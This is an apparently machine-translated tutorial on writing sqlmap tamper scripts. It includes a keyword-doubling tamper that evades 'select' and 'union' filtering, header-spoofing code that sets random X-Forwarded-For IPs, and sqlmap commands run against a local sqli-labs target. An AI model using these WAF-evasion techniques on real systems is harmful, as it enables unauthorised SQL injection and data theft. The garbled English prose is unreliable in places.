Write sqlmap tamper

Brief tamper

sqlmap the --tamperparameter script may be introduced to modify user-defined payload during injection, whereby the bypass can be used to tamper WAF, filtered keyword is replaced and the like. This is a basic structure of tamper.

In other keywords, etc. filtered. This is a basic structure of tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW # 当前脚本调用优先等级 def dependencies(): # 声明当前脚本适用/不适用的范围，可以为空。 pass def tamper(payload, **kwargs): # 用于篡改Payload、以及请求头的主要函数 return payload 

Want to save him  my.py  into the  sqlmaptamper  path, and then use the time to add parameters  --tamper=my  on the line simple analysis

 

Simple Analysis

Take a tamper official have to analyze the structure

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def randomIP(): numbers = [] while not numbers or numbers[0] in (10, 172, 192): numbers = random.sample(xrange(1, 255), 4) return '.'.join(str(_) for _ in numbers) def tamper(payload, **kwargs): """ Append a fake HTTP header 'X-Forwarded-For' """ headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() return payload 

Import into the part, __priority__  function attribute, the function Dependencies, Tamper functions and user-defined

import

In this section we can sqlmap into the interior of the library, to us a lot sqlmap packaged functions and data types, such as the following PRIORITYon fromsqlmap/lib/core/enums.py

PRIORITY

PRIORITY is a priority defined tamper, PRIORITY has the following parameters:
- LOWEST = -100
- the LOWER = -50
- the LOW = -10
- 0 = the NORMAL
- HIGH = 10
- 50 = IN AREAS OF COMMUNICAITIONS
- HIGHEST = 100
if the user uses more tamper, sqlmap priority will be to use a higher level of tamper according to the parameters defined level of each tamper pRIORITY, if you need to have two tamper with, you need to pay attention to this issue.

dependencies

dependencies mainly to prompt the user, which the tamper database support, the specific code as follows:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("这是我的tamper提示")

def tamper(payload, **kwargs):
    return payload

 

DBMS.MYSQL This parameter represents Mysql, parameters other databases can also look at thissqlmaplibcoreenums.py

 

 

 

Tamper

tamper function is the most important function of tamper, you have to realize the function, where everything is written in this function. This parameter is the original payload inject payload sqlmap, we have to realize bypass, is the general modifications to the payload of. kwargs against modify http header, if you bypass, is by modifying the http header, we need to use this

Based payload

First-come, based on the modified payload to bypass keyword substitution, I use the first hurdle sqlilab, and modify some of the malicious code to replace keyword empty to avoid joint inquiry, as

 

 

 

Write tamper write to double bypass

def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select','seleselectct')
    payload = payload.replace('union','ununionion')
    return payload

Before not using tamper, we add --tech=Uto make sqlmap only tested the joint inquiry injection, --flush-sessionmeaning that each time you refresh the session, clearing the last of the cache.

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --dbms=mysql

 

 

 

Seen from the flow burp in the payload is no double wrote, is bound to inject failure. But after using tamper

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --tamper=my --dbms=mysql

 

 

 

double the normal payload, can be injected

 

 

 

Http-based head

We use the sqlmaptamperxforwardedfor.pytamper to explain

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

From kwargsextraction of headersthe array, and then modify the value reaches xff random IP effect, not repeated.

to sum up

This paper briefly describes the preparation of tamper and double written as a demonstration example, in the actual penetration test, we need to write different for different tamper waf be used flexibly.